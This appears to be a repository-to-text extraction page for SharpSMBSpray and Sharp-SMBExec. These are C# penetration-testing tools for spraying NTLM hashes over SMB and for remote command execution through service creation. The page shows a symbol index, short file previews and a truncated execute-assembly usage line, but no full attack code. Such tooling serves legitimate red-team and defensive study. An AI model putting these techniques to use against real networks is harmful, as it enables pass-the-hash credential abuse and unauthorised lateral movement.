FILE: Sharp-SMBExec/SharpInvoke-SMBExec/ArgParse.cs
class ArgParse (line 8) | public static class ArgParse
method Parse (line 13) | public static ArgumentParserResult Parse(IEnumerable<string> args)
class ArgumentParserResult (line 50) | public class ArgumentParserResult
method ArgumentParserResult (line 55) | private ArgumentParserResult(bool parsedOk, Dictionary<string, string>...
method Success (line 61) | public static ArgumentParserResult Success(Dictionary<string, string> ...
method Failure (line 64) | public static ArgumentParserResult Failure()
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Program.cs
class Program (line 13) | public class Program
method Main (line 16) | public static void Main(string[] args)
method displayHelp (line 1675) | public static void displayHelp(string message)
method SendStream (line 1681) | private static byte[] SendStream(NetworkStream stream, byte[] BytesToS...
method GetNetBIOSSessionService (line 1690) | private static byte[] GetNetBIOSSessionService(int SMB_Header_Length, ...
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/SMBExec.cs
class SMBExec (line 7) | public class SMBExec
method NetBIOSSessionService (line 18) | public static OrderedDictionary NetBIOSSessionService(int packet_heade...
method SMBHeader (line 29) | public static OrderedDictionary SMBHeader(byte[] packet_command, byte[...
method SMBNegotiateProtocolRequest (line 49) | public static OrderedDictionary SMBNegotiateProtocolRequest(bool Force...
method SMBSessionSetupAndXRequest (line 77) | public static OrderedDictionary SMBSessionSetupAndXRequest(byte[] pack...
method SMBTreeConnectAndXRequest (line 106) | public static OrderedDictionary SMBTreeConnectAndXRequest(byte[] packe...
method SMBNTCreateAndXRequest (line 125) | public static OrderedDictionary SMBNTCreateAndXRequest(byte[] packet_n...
method SMBReadAndXRequest (line 154) | public static OrderedDictionary SMBReadAndXRequest(byte[] SMB_FID)
method SMBWriteAndXRequest (line 176) | public static OrderedDictionary SMBWriteAndXRequest(byte[] packet_file...
method SMBCloseRequest (line 199) | public static OrderedDictionary SMBCloseRequest(byte[] packet_file_ID)
method SMBTreeDisconnectRequest (line 210) | public static OrderedDictionary SMBTreeDisconnectRequest()
method SMBLogoffAndXRequest (line 217) | public static OrderedDictionary SMBLogoffAndXRequest()
method SMB2Header (line 230) | public static OrderedDictionary SMB2Header(byte[] packet_command, int ...
method SMB2NegotiateProtocolRequest (line 260) | public static OrderedDictionary SMB2NegotiateProtocolRequest()
method SMB2SessionSetupRequest (line 277) | public static OrderedDictionary SMB2SessionSetupRequest(byte[] packet_...
method SMB2TreeConnectRequest (line 295) | public static OrderedDictionary SMB2TreeConnectRequest(byte[] packet_p...
method SMB2CreateRequestFile (line 309) | public static OrderedDictionary SMB2CreateRequestFile(byte[] packet_na...
method SMB2ReadRequest (line 334) | public static OrderedDictionary SMB2ReadRequest(byte[] packet_file_ID)
method SMB2WriteRequest (line 352) | public static OrderedDictionary SMB2WriteRequest(byte[] packet_file_ID...
method SMB2CloseRequest (line 372) | public static OrderedDictionary SMB2CloseRequest(byte[] packet_file_ID)
method SMB2TreeDisconnectRequest (line 381) | public static OrderedDictionary SMB2TreeDisconnectRequest()
method SMB2SessionLogoffRequest (line 388) | public static OrderedDictionary SMB2SessionLogoffRequest()
method NTLMSSPNegotiate (line 395) | public static OrderedDictionary NTLMSSPNegotiate(byte[] packet_negotia...
method NTLMSSPAuth (line 458) | public static OrderedDictionary NTLMSSPAuth(byte[] packet_NTLM_response)
method RPCBind (line 487) | public static OrderedDictionary RPCBind(int packet_call_ID, byte[] pac...
method RPCRequest (line 575) | public static OrderedDictionary RPCRequest(byte[] packet_flags, int pa...
method SCMOpenSCManagerW (line 631) | public static OrderedDictionary SCMOpenSCManagerW(byte[] packet_servic...
method SCMCreateServiceW (line 661) | public static OrderedDictionary SCMCreateServiceW(byte[] packet_contex...
method SCMStartServiceW (line 699) | public static OrderedDictionary SCMStartServiceW(byte[] packet_context...
method SCMDeleteServiceW (line 706) | public static OrderedDictionary SCMDeleteServiceW(byte[] packet_contex...
method SCMCloseServiceHandle (line 713) | public static OrderedDictionary SCMCloseServiceHandle(byte[] packet_co...
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Utilities.cs
class Utilities (line 9) | class Utilities
method DataLength (line 11) | public static ushort DataLength(int length_start, byte[] string_extrac...
method GetByteRange (line 17) | public static byte[] GetByteRange(byte[] array, int start, int end)
method ConvertStringToByteArray (line 23) | public static byte[] ConvertStringToByteArray(string hex)
method ConvertFromPacketOrderedDictionary (line 31) | public static byte[] ConvertFromPacketOrderedDictionary(OrderedDiction...
FILE: SharpSMBSpray/SharpSMBSpray/Program.cs
class Program (line 7) | class Program
method Main (line 9) | public static void Main(string[] args)
Condensed preview — 41 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (243K chars).
[
{
"path": ".gitattributes",
"chars": 66,
"preview": "# Auto detect text files and perform LF normalization\n* text=auto\n"
},
{
"path": ".gitignore",
"chars": 48,
"preview": ".vs\n*.user\n[Dd]ebug/\n[Rr]elease/\n[Bb]in/\n[Oo]bj/"
},
{
"path": "LICENSE",
"chars": 1516,
"preview": "BSD 3-Clause License\n\nCopyright (c) 2021, rvrsh3ll\nAll rights reserved.\n\nRedistribution and use in source and binary for"
},
{
"path": "README.md",
"chars": 209,
"preview": "# SharpSMBSpray\n Spray a hash via smb to check for local administrator access\n \n## Example\n\nexecute-assembly /home/teste"
},
{
"path": "Sharp-SMBExec/.gitattributes",
"chars": 2518,
"preview": "###############################################################################\n# Set default behavior to automatically "
},
{
"path": "Sharp-SMBExec/.gitignore",
"chars": 3833,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n\n# User"
},
{
"path": "Sharp-SMBExec/README.md",
"chars": 1850,
"preview": "# Sharp-SMBExec\nA native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script. (https://github.com/Kevin-R"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/App.config",
"chars": 178,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n <startup> \n \n <supportedRuntime version=\"v4.0\" sku="
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/ArgParse.cs",
"chars": 2484,
"preview": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\n\nnamespace SharpInvoke_SMBExec\n{\n"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/Program.cs",
"chars": 136713,
"preview": "using System;\nusing System.Threading;\nusing System.Security.Cryptography;\nusing System.Diagnostics;\nusing System.Net.So"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/Properties/AssemblyInfo.cs",
"chars": 1411,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/SMBExec.cs",
"chars": 53209,
"preview": "using System;\nusing System.Collections.Specialized;\nusing System.Linq;\n\nnamespace SharpInvoke_SMBExec\n{\n public clas"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/SharpInvoke-SMBExec.csproj",
"chars": 3312,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" DefaultTargets=\"Build\" xmlns=\"http://schemas.micros"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/Utilities.cs",
"chars": 1586,
"preview": "using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Collections.Specialized;\nusing S"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec/packages.config",
"chars": 133,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"IPNetwork\" version=\"1.3.2.0\" targetFramework=\"net40\" /"
},
{
"path": "Sharp-SMBExec/SharpInvoke-SMBExec.sln",
"chars": 1000,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 14\nVisualStudioVersion = 14.0.25420.1\nMini"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/FodyWeavers.xml",
"chars": 137,
"preview": "<Weavers xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceSchemaLocation=\"FodyWeavers.xsd\">\n <Cost"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/FodyWeavers.xsd",
"chars": 6616,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n <!-- This file was gen"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/Program.cs",
"chars": 1010,
"preview": "using System;\nusing System.Threading.Tasks;\nusing LukeSkywalker.IPNetwork;\n\nnamespace SharpSMBSpray\n{\n class Program"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/Properties/AssemblyInfo.cs",
"chars": 1394,
"preview": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Infor"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/SharpSMBSpray.csproj",
"chars": 4221,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "SharpSMBSpray/SharpSMBSpray/packages.config",
"chars": 371,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"Costura.Fody\" version=\"4.1.0\" targetFramework=\"net40\" "
},
{
"path": "SharpSMBSpray/SharpSMBSpray.sln",
"chars": 1640,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3011"
},
{
"path": "SharpSMBSpray/packages/Costura.Fody.4.1.0/build/Costura.Fody.props",
"chars": 204,
"preview": "<Project xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n <ItemGroup>\n <WeaverFiles Include=\"$(MsBuild"
},
{
"path": "SharpSMBSpray/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml",
"chars": 469,
"preview": "<?xml version=\"1.0\"?>\n<doc>\n <assembly>\n <name>Costura</name>\n </assembly>\n <members>\n <member na"
},
{
"path": "SharpSMBSpray/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.xcf",
"chars": 4636,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n<xs:complexType xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n <xs:all>\n <xs"
},
{
"path": "SharpSMBSpray/packages/Fody.6.0.0/build/Fody.targets",
"chars": 4665,
"preview": "<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n\n <PropertyGroup>\n <Projec"
}
]
// ... and 14 more files (download for full content)
About this extraction
This page contains the full source code of the rvrsh3ll/SharpSMBSpray GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 41 files (229.9 KB), approximately 52.3k tokens, and a symbol index with 49 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.